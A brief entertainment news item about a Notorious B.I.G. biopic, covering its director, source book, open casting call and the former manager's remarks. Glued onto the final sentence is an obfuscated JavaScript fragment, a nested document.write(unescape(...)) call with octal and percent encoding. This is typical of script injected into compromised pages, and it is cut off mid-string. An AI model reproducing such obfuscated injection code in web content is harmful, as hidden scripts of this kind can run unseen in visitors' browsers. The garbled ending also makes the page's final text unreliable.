P. Diddy is reportedly in line to executive produce a biopic about the life of the late rapper Notorious B.I.G. (real name Christopher Wallace).
Directed by George Tillman Jr, the film "Notorious" will be based upon the book "Unbelievable: The Life, Death, and Afterlife of the Notorious B.I.G." by Cheo Hodari Coker.
Movie studio Fox Searchlight has already announced an open audition for aspiring actors to put themselves forward for the lead role.
Starting from today (August 13th) anyone can submit a video to the website www.biggiecasting.com.
According to the rapper's former manager, Wayne Barrow, his former client's shoes will be difficult to fill.
He said: "As it relates to the individual Christopher Wallace - his looks, his stature, what he represented, the swagger, the sensibility of the man - all those elements are very difficult to find, no matter where you go.
"In the typical Hollywood world, no one came to mind outside of Forest Whitaker who could capture that essence genuinely."
The studio stated they intend to concentrate on the rapper's private life, zeroing in on "the humanity within Christopher himself."document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
